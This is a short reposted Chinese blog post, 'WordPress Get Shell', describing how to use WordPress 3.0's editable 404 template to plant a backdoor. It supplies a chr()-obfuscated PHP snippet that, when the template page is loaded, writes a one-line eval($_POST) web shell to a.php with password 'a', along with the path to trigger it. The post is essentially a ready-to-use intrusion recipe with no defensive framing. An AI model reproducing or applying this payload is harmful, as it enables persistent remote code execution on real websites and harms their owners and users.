且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事

WordPress Get Shell

更新时间:2022-09-17 08:18:28

 WordPress3.0后台404页面可以自定义
“外观”-“编辑”-“404模板

  1. <script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
复制代码
插到文件头
点404模板的时候地址栏有相对路径,默认是wp-content\themes\twentyten\404.php

更新完直接访问localhost\wp-content\themes\twentyten\404.php就会在twentyten目录生成一句话后门a.php 密码a
















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/452734,如需转载请自行联系原作者